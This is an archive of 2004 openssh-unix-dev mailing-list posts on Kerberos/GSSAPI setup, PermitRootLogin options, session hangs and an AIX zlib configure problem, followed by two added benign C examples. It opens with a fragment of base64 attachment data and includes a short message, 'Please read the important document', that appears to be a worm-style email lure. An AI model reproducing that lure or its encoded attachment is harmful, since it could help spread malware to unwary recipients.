wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////////////////////// /////////////////////////////////////////////8DAwAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAICAgP////////////////////////////////////////////////////////// 
/////////////////////////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP// //////////////////////////////////////////////////////////////////////// /////////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////// /////////////////////////////////8DAwMDAwMDAwMDAwMDAwMDAwP///////////8DA wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////////////// /////////////////////////////////////////////////////8DAwAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAICAgP///////////8DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA wMDAwMDAwMDAwMDAwMDAwMDAwP///////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AICAgP////////////////////////////////////////////////////////////////// /////////////////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////// /8DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwP////// /////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////// /////////////////////////////////////////////////////////////8DAwAAAAP8A AAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAMDAwMDAwMDA wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwP///////////8DAwAAAAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAP////////////////////////// /////////////////////////////8DAwAAAAP8AAAAAAP////////////////////////// //////////////////////8AAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA wP///////////8DAwAAAAAAAAP8AAP////8AAAAAAP8AAP////8AAAAAAP8AAAAAAP////// /////wAAAP8AAP///////////////////////////////////////////////////////8DA wAAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAAAAAP8AAMDAwP////////8AAAAAAMDA wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwP///////////8DAwAAAAAAAAP8AAP// //8AAAAAAP8AAP////8AAAAAAP8AAAAAAICAgP///////wAAAP8AAP////////////////// /////////////////////////////////////8DAwAAAAP8AAAAAAP///wAAAP8AAAAAAP8A AAAAAP8AAAAAAP8AAAAAAP////////8AAAAAAMDAwMDAwP///////8DAwMDAwMDAwMDAwMDA wMDAwMDAwP///////////8DAwAAAAAAAAP8AAP////8AAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAMDAwP///wAAAP8AAP///////////////8DAwMDAwMDAwP///8DAwMDAwMDAwP////// 
/////8DAwAAAAP8AAAAAAP///wAAAP8AAP////8AAAAAAP8AAP////8AAAAAAICAgP////8A AAAAAMDAwMDAwP///////8DAwMDAwP///////////////8DAwP///////////8DAwAAAAAAA AP8AAAAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAP////////// /////8DAwMDAwMDAwP///////8DAwMDAwP///////////8DAwAAAAP8AAAAAAP8AAAAAAP8A AP////8AAAAAAP8AAP////8AAAAAAP8AAAAAAP8AAAAAAMDAwMDAwP///////8DAwP////// /////////////8DAwP///////////8DAwAAAAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAP///////////////8DAwMDAwP///////4CAgAAAAAAA AAAAAAAAAAAAAAAAAAAAAP8AAAAAAP////////////////////////////////////////// //////8AAAAAAP///////////////8DAwMDAwMDAwMDAwICAgP///////////8DAwICAgAAA AAAAAAAAAP8AAP///////////////////////////////////////////////wAAAP8AAP// /////////////8DAwMDAwMDAwMDAwICAgP///////8DAwICAgAAAAAAAAAAAAP8AAAAAAP8A AAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP////////////////// /////////////4CAgP///8DAwICAgAAAAAAAAAAAAAAAAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAP///////////////////////////////4CA gMDAwICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////// /////////////////////////////////////////////////////4CAgICAgAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////// /////////////////////////////////////4CAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA gICAgICAgICAgICAgICAgICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP/////+AAAA/gAAAP4AAAD+AAAA/gAAAP4A AAD+AAAA/gAAAP4AAAD+AAAA/gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAAADAAAABwAAAA/+AAAf/gAAP/4AAH//////SH0BAAAA AQABACAgAAABABgAqAwAAAEAAAAAAAAAAAAAAAAAKK4BAPCtAQAAAAAAAAAAAAAAAAA1rgEA AK4BAAAAAAAAAAAAAAAAAEKuAQAIrgEAAAAAAAAAAAAAAAAAT64BABCuAQAAAAAAAAAAAAAA AABargEAGK4BAAAAAAAAAAAAAAAAAGauAQAgrgEAAAAAAAAAAAAAAAAAAAAAAAAAAABwrgEA 
--21665162--

From f_mohr at yahoo.de Tue Mar 30 01:05:30 2004
From: f_mohr at yahoo.de (Frank Mohr)
Date: Mon, 29 Mar 2004 17:05:30 +0200
Subject: Flags in pam_password_change_required() (auth-pam.c)
References: <40680CB3.7280AA50@yahoo.de>
Message-ID: <40683B3A.EBB9AE5F@yahoo.de>

sorry ... my fault

these are all "no_*" flags that get true with the 2nd bit set

writing down the question sometimes helps to find the answer by myself.

frank

Frank Mohr wrote:
>
> Hi
>
> I just "stumbled" over the flags settings in
> pam_password_change_required().
> As far as I looked over the OpenSSH code, setting/resetting the 2nd bit
> in those flags from auth-options.c would only make sense if the flags
> are checked to be 0/1 in the remaining OpenSSH code.
>
> Frank

From mld12 at uark.edu Tue Mar 30 08:09:06 2004
From: mld12 at uark.edu (mld12 at uark.edu)
Date: Mon, 29 Mar 2004 16:09:06 -0600
Subject: openssh and SEAM (Kerberos)
Message-ID: <17554831757c55.1757c551755483@uark.edu>

I'm trying to get openssh to work with SEAM (Solaris
Enterprise Authentication Mechanism) on Solaris 9.
I have a few questions. Any help would be appreciated.
I am working with openssh 3.8.

1. First of all, does anyone know if it is possible
to get openssh working with SEAM?

2. Which options do I need to use when compiling
openssh? Do I need to use --with-kerberos5=kerbpath
or --with-pam or both?

3. Which options need to be enabled in the sshd_config?
KerberosAuthentication? GSSAPIAuthentication?

4. Which options are needed in ssh_config?
GSSAPIAuthentication yes? GSSAPIDelegateCredentials yes?

5. Does openssh rely on the pam_krb5 module?

6. Are there any good sources of information regarding
the integration of SEAM and openssh?

I have tried many combinations of these options but have
been unsuccessful so far. Maybe I'm missing something.
I've looked at docs.sun.com with no luck. I have browsed
the mailing list archives at openssh.org (that's where I
got some of the options listed above) but again, no luck.
I did download the kerberized telnet, rlogin, and ftp
package from sun, and it works fine. Any insight would be
appreciated. Thanks in advance for any help provided.

Matthew L. Davis
mld12 at uark.edu

From Darren.Moffat at Sun.COM Tue Mar 30 08:21:14 2004
From: Darren.Moffat at Sun.COM (Darren J Moffat)
Date: Mon, 29 Mar 2004 14:21:14 -0800
Subject: openssh and SEAM (Kerberos)
In-Reply-To: <17554831757c55.1757c551755483@uark.edu>
References: <17554831757c55.1757c551755483@uark.edu>
Message-ID: <4068A15A.2080807@Sun.COM>

mld12 at uark.edu wrote:
> I'm trying to get openssh to work with SEAM (Solaris
> Enterprise Authentication Mechanism) on Solaris 9.
> I have a few questions. Any help would be appreciated.
> I am working with openssh 3.8.
>
> 1. First of all, does anyone know if it is possible
> to get openssh working with SEAM?

Yes it is. You should be able to get it to work by ensuring GSS support
is enabled.

> 2. Which options do I need to use when compiling
> openssh? Do I need to use --with-kerberos5=kerbpath
> or --with-pam or both?

SEAM does not expose any Kerberos APIs, only GSS.

> 5. Does openssh rely on the pam_krb5 module?

No.

Describe what problems you are having and give the debug output from the
client and server.

--
Darren J Moffat

From dtucker at zip.com.au Tue Mar 30 12:14:55 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Tue, 30 Mar 2004 12:14:55 +1000
Subject: PermitRootLogin issues
In-Reply-To: <405E3673.9080000@verizon.net>
References: <405E3673.9080000@verizon.net>
Message-ID: <4068D81F.9020400@zip.com.au>

Stephen Roylance wrote:
> I'm currently experiencing the issue laid out in this thread from last
> year:
> http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=106908815129641&w=2
>
> The discussion that ensued resulted in a number of ideas on how best to
> 'fix' this issue. The two that seemed most reasonable were:
> 1. implement a pubkey-only option to PermitRootLogin that would only
> allow root to login using pubkey authentication.
> 2. implement a more flexible arrangement where a list of allowed
> authentication methods could be passed to PermitRootLogin.

There is an open bug (#701) for this [1].

> I looked through the code and it seems that both are straightforward to
> code, but obviously 1 is much less work. I coded up an implementation of
> pubkey-only that works for me, and it's attached. I'm willing to work
> on option 2, but since that's quite a bit more work, I'd like some
> assurance that that is the _right_ way before I start on it.

I have just added this to the bug:

[quote]
The current plan is to switch away from the current "without-password" to a
positive list of allowed methods, e.g.

PermitRootLogin pubkey,hostbased,keyboard-interactive

and keep "without-password" as an alias for something like "pubkey,hostbased"

One thing that isn't clear is whether or not keyboard-interactive should
specify the specific "devices", eg keyboard-interactive/pam.
[/quote]

Good patches implementing the above are likely to be accepted.

> I think some solution needs to be merged ASAP. I've seen the
> recommendation to use without-password if root logins for scripting must
> be allowed in various security docs. With more sites using PAM and
> non-typical authentication methods (LDAP, winbind), it can be a nasty
> shock (or worse, completely unnoticed) to an administrator when that
> option doesn't work as they expect.

[1] http://bugzilla.mindrot.org/show_bug.cgi?id=701

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From djm at mindrot.org Tue Mar 30 14:02:44 2004
From: djm at mindrot.org (Damien Miller)
Date: Tue, 30 Mar 2004 14:02:44 +1000
Subject: environ problem in 3.8p1
In-Reply-To:
References: <200403071542.i27FgxNh023809@mx1.cs.umb.edu> <404C4DF5.7000800@zip.com.au> <404FCCBF.8040402@mindrot.org>
Message-ID: <4068F164.9010405@mindrot.org>

Damien Miller wrote:
> In his ignorance, on Thu, 11 Mar 2004, Damien Miller mistakenly wrote:
>
>
>>No, the protocol does not include a way to transmit more than the
>>terminal type ($TERM).
>
> Markus pointed out that I am wrong: protocol 2 has a request to pass
> environment variables, which we don't implement.

There is now a patch to implement environment passing in:

http://bugzilla.mindrot.org/show_bug.cgi?id=815

The patch is against -current, but if you are lucky it should apply
against 3.8p1 too. This is subject to change, but needs testing with
other SSH implementations.

-d

From Frank.Beckmann at vodafone.com Tue Mar 30 22:15:41 2004
From: Frank.Beckmann at vodafone.com (Frank Beckmann)
Date: Tue, 30 Mar 2004 14:15:41 +0200
Subject: All SSH Version
Message-ID: <406964ED.9080300@vodafone.com>

Hello :-)

All ssh versions we use have the same problem:

when we start a daemon process, the windows hang on exit.

OS Solaris 6 and 8

Solaris 9 and 10 come with a SUN implementation of your openssh, the shell
doesn't hang on exit....

The workarounds on the Web don't fix the problem...

Frank

--
kind regards

Frank Beckmann
Infrastructure Service Management
_______________________________________
Vodafone D2 GmbH
Prozess T O I U
Technical Operations Infrastructure UNIX
Am Seestern 4 / E7 Room 14
D-40547 Düsseldorf
Phone: +49 (0)211-5 33 57 58
Fax: +49 (0)211-5 33 14 51
Frank.Beckmann at vodafone.com

From djm at mindrot.org Tue Mar 30 22:38:44 2004
From: djm at mindrot.org (Damien Miller)
Date: Tue, 30 Mar 2004 22:38:44 +1000
Subject: All SSH Version
In-Reply-To: <406964ED.9080300@vodafone.com>
References: <406964ED.9080300@vodafone.com>
Message-ID: <40696A54.3020506@mindrot.org>

Frank Beckmann wrote:
> Hello :-)
>
> All ssh versions we use have the same problem:
>
> when we start a daemon process, the windows hang on exit.

http://bugzilla.mindrot.org/show_bug.cgi?id=52

> OS Solaris 6 and 8
>
> Solaris 9 and 10 come with a SUN implementation of your openssh, the shell
> doesn't hang on exit....

It breaks other things.

> The workarounds on the Web don't fix the problem...

We will soon start testing the patch at
http://bugzilla.mindrot.org/show_bug.cgi?id=52

It looks promising.

-d

From dtucker at zip.com.au Tue Mar 30 22:40:33 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Tue, 30 Mar 2004 22:40:33 +1000
Subject: All SSH Version
In-Reply-To: <406964ED.9080300@vodafone.com>
References: <406964ED.9080300@vodafone.com>
Message-ID: <40696AC1.80005@zip.com.au>

Frank Beckmann wrote:
> All ssh versions we use have the same problem:
>
> when we start a daemon process, the windows hang on exit.

See: http://bugzilla.mindrot.org/show_bug.cgi?id=52

Make sure your daemons close all their fds, especially stdin, stdout and
stderr.

> OS Solaris 6 and 8
>
> Solaris 9 and 10 come with a SUN implementation of your openssh, the shell
> doesn't hang on exit....

There is some evidence that whatever SunSSH does causes other
problems: http://bugzilla.mindrot.org/show_bug.cgi?id=813

BTW please don't use the openssh@ address for Portable bug reports unless
they are security exposures.

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From dberezin at acs.rutgers.edu Wed Mar 31 07:32:04 2004
From: dberezin at acs.rutgers.edu (Dmitry Berezin)
Date: Tue, 30 Mar 2004 16:32:04 -0500
Subject: ssh-add
Message-ID: <006b01c4169e$7320f4c0$5bd90680@acsdev78>

I'm trying to have ssh-agent started for a particular user on the Solaris
8 server when the server boots up, so that I could run some SCPs from cron
and use publickey authentication with encrypted key. With OpenSSH version
3.8p1 ssh-add takes the pass-phrase from standard input, so I can automate
ssh-agent startup, but with the slightly older versions of OpenSSH this
does not work. Is this a feature that was recently implemented or a bug
that will be fixed later on (and I can not rely on having this
functionality in the future)? I am not sure if I am doing this conceptually
correct in the first place though.

Thank you,

-Dmitry.

From shall at nebraska.edu Wed Mar 31 07:45:36 2004
From: shall at nebraska.edu (Steve Hall)
Date: Tue, 30 Mar 2004 15:45:36 -0600
Subject: Config failure with 3.8p1 on AIX
Message-ID:

Hello,
I have noted the following failure in the configure script for 3.8p1. The
apparent error is

--------------------------------------------------------------------------------------------------
configure:5911: cc -E conftest.c
"configure", line 5908.10: 1506-296 (S) #include file not found.
configure:5917: $? = 1
configure: failed program was:
#line 5907 "configure"
#include "confdefs.h"
#include
configure:5936: result: no
configure:5941: error: *** zlib.h missing - please install first or check config .log **
--------------------------------------------------------------------------------------------------

The configure command (cc -E) is being invoked without the option
-I/usr/local/include.

This is not a problem with my previous (and current) copy of 3.7.p2. (I
reconfigured, and regenerated for SSL 9.7.d ).

I can bypass the problem by setting CPPFLAGS=-I/usr/local/include but
wonder if I have missed some change to instructions since I have to do
this with 3.8p1 but did not for 3.7p2.

The environment is
AIX 5.1 ML005,
VisualAge/C/C++ v5 (fixes current as of 11/03)
Zlib 1.1.4 (zlib.h is in /usr/local/include)

configure options are:
./configure --with-tcp-wrappers --with-prngd-socket=/var/run/egd-pool

Has anyone else seen this?

Thanks,
Steve

Steve Hall (shall at nebraska.edu)
Computing Services Network
University of Nebraska

From erik at bosrup.com Wed Mar 31 02:20:54 2004
From: erik at bosrup.com (erik at bosrup.com)
Date: Tue, 30 Mar 2004 18:20:54 +0200
Subject: your product
Message-ID: <20040330222039.E5C5427C187@shitei.mindrot.org>

Please read the important document.

From dtucker at zip.com.au Wed Mar 31 10:05:06 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Wed, 31 Mar 2004 10:05:06 +1000
Subject: Config failure with 3.8p1 on AIX
In-Reply-To:
References:
Message-ID: <406A0B32.3040007@zip.com.au>

Steve Hall wrote:
> Hello,
> I have noted the following failure in the configure script for 3.8p1. The
> apparent error is
[...]
> configure:5941: error: *** zlib.h missing - please install first or check

You have a zlib.a in /usr/lib but don't have the corresponding zlib.h in
/usr/include.

> The configure command (cc -E) is being invoked without the option
> -I/usr/local/include.
>
> This is not a problem with my previous (and current) copy of 3.7.p2. (I
> reconfigured, and regenerated for SSL 9.7.d ).
>
> I can bypass the problem by setting CPPFLAGS=-I/usr/local/include but
> wonder if I have
> missed some change to instructions since I have to do this with 3.8p1 but
> did not for 3.7p2.

Configure no longer automatically searches /usr/local/{lib,include} by
default.

If your zlib is in /usr/local (it sounds like it is) you can use
"./configure --with-zlib=/usr/local"

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From dtucker at zip.com.au Wed Mar 31 10:08:40 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Wed, 31 Mar 2004 10:08:40 +1000
Subject: Config failure with 3.8p1 on AIX
In-Reply-To: <406A0B32.3040007@zip.com.au>
References: <406A0B32.3040007@zip.com.au>
Message-ID: <406A0C08.6010302@zip.com.au>

Darren Tucker wrote:
> Configure no longer automatically searches /usr/local/{lib,include} by
> default.

Correction: configure will search /usr/local *if* it doesn't find zlib
elsewhere. You have zlib.a in /usr/lib, so this doesn't happen.

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From tim at multitalents.net Wed Mar 31 10:14:15 2004
From: tim at multitalents.net (Tim Rice)
Date: Tue, 30 Mar 2004 16:14:15 -0800 (PST)
Subject: Config failure with 3.8p1 on AIX
In-Reply-To:
References:
Message-ID:

On Tue, 30 Mar 2004, Steve Hall wrote:

[snip]
> The configure command (cc -E) is being invoked without the option
> -I/usr/local/include.
>
> This is not a problem with my previous (and current) copy of 3.7.p2. (I
> reconfigured, and regenerated for SSL 9.7.d ).
>
> I can bypass the problem by setting CPPFLAGS=-I/usr/local/include but
> wonder if I have
> missed some change to instructions since I have to do this with 3.8p1 but
> did not for 3.7p2.

Here is the relevant entry in ChangeLog

20040123
 - (tim) [configure.ac] Remove hard coded -L/usr/local/lib and
   -I/usr/local/include. Users can do LDFLAGS="-L/usr/local/lib" \
   CPPFLAGS="-I/usr/local/include" ./configure if needed.

--
Tim Rice Multitalents (707) 887-1469
tim at multitalents.net
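
The advice in the "All SSH Version" replies earlier in this archive (close all of a daemon's fds, especially stdin, stdout and stderr), as an added C example that is not from the posts or from OpenSSH. It models the session's output channel as a pipe: the reader, standing in for sshd, sees EOF only once the background process has dropped the descriptors it inherited; `detach_fds` and `session_sees_eof` are names made up for this sketch.

```c
#include <fcntl.h>
#include <poll.h>
#include <signal.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Point stdin/stdout/stderr at /dev/null and close every other inherited
 * descriptor, so the process keeps nothing that belongs to the session. */
static int detach_fds(void)
{
    long maxfd = sysconf(_SC_OPEN_MAX);
    int devnull = open("/dev/null", O_RDWR);
    int fd;

    if (devnull < 0)
        return -1;
    for (fd = 0; fd <= 2; fd++)
        if (dup2(devnull, fd) < 0)
            return -1;
    /* Cap the sweep: some systems report a very large limit. */
    if (maxfd < 0 || maxfd > 65536)
        maxfd = 65536;
    for (fd = 3; fd < maxfd; fd++)
        close(fd);              /* also closes devnull when it is > 2 */
    return 0;
}

/* Returns 1 if the reader gets EOF on the session pipe within timeout_ms
 * after its own write end is closed, 0 if it is still waiting (the hang),
 * -1 on setup failure. The child plays the daemon started from the shell. */
static int session_sees_eof(int daemon_detaches, int timeout_ms)
{
    int p[2], status, saw_eof = 0;
    struct pollfd pfd;
    pid_t pid;
    char c;

    if (pipe(p) < 0)
        return -1;
    pid = fork();
    if (pid < 0) {
        close(p[0]);
        close(p[1]);
        return -1;
    }
    if (pid == 0) {
        /* Child inherits p[1], like a daemon inheriting the session stdout. */
        if (daemon_detaches && detach_fds() < 0)
            _exit(1);
        sleep(30);              /* long-running work */
        _exit(0);
    }
    close(p[1]);                /* the login shell has exited */
    pfd.fd = p[0];
    pfd.events = POLLIN;
    if (poll(&pfd, 1, timeout_ms) > 0 && read(p[0], &c, 1) == 0)
        saw_eof = 1;            /* every writer is gone: session can close */
    kill(pid, SIGKILL);
    waitpid(pid, &status, 0);
    close(p[0]);
    return saw_eof;
}

int main(void)
{
    printf("daemon keeps inherited fds: EOF seen = %d\n",
           session_sees_eof(0, 300));
    printf("daemon detaches its fds:    EOF seen = %d\n",
           session_sees_eof(1, 2000));
    return 0;
}
```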
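
The positive-list plan quoted in the "PermitRootLogin issues" message earlier in this archive, sketched as an added C example; it is not OpenSSH code, and the list syntax is only the proposal quoted there. The function names, the bit values and the `password` token are assumptions, and `legacy_without_password_allows` models the existing option as refusing only the `password` method, which is the surprise the thread describes for PAM sites.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical bit values for the methods named in the quoted proposal. */
enum { M_PUBKEY = 1, M_HOSTBASED = 2, M_KBDINT = 4, M_PASSWORD = 8 };
#define M_ALL     (M_PUBKEY | M_HOSTBASED | M_KBDINT | M_PASSWORD)
#define M_INVALID (-1)

/* Map one token of the list to its bit; 0 means unknown or empty. */
static int method_bit(const char *name, size_t len)
{
    static const struct { const char *name; int bit; } tbl[] = {
        { "pubkey", M_PUBKEY },
        { "hostbased", M_HOSTBASED },
        { "keyboard-interactive", M_KBDINT },
        { "password", M_PASSWORD },     /* assumed token, not in the post */
    };
    size_t i;

    for (i = 0; i < sizeof(tbl) / sizeof(tbl[0]); i++)
        if (strlen(tbl[i].name) == len && memcmp(tbl[i].name, name, len) == 0)
            return tbl[i].bit;
    return 0;
}

/* Parse a PermitRootLogin value into a mask of allowed methods.
 * Any unknown or empty token rejects the whole value (fail closed). */
static int parse_root_login(const char *value)
{
    const char *p = value;
    int mask = 0;

    if (strcmp(value, "no") == 0)
        return 0;
    if (strcmp(value, "yes") == 0)
        return M_ALL;
    if (strcmp(value, "without-password") == 0)
        return M_PUBKEY | M_HOSTBASED;  /* alias from the quoted plan */
    for (;;) {
        size_t len = strcspn(p, ",");
        int bit = method_bit(p, len);

        if (bit == 0)
            return M_INVALID;
        mask |= bit;
        if (p[len] == '\0')
            break;
        p += len + 1;
    }
    return mask;
}

/* Positive list: root may use a method only if it was listed. */
static int root_may_use(int mask, int method)
{
    return mask > 0 && (mask & method) != 0;
}

/* Model of the existing negative check: everything but "password" passes. */
static int legacy_without_password_allows(int method)
{
    return method != M_PASSWORD;
}

int main(void)
{
    int alias = parse_root_login("without-password");

    printf("legacy without-password, keyboard-interactive: %d\n",
           legacy_without_password_allows(M_KBDINT));
    printf("alias pubkey,hostbased, keyboard-interactive:  %d\n",
           root_may_use(alias, M_KBDINT));
    printf("typo in list rejected: %d\n",
           parse_root_login("pubkey,pasword") == M_INVALID);
    return 0;
}
```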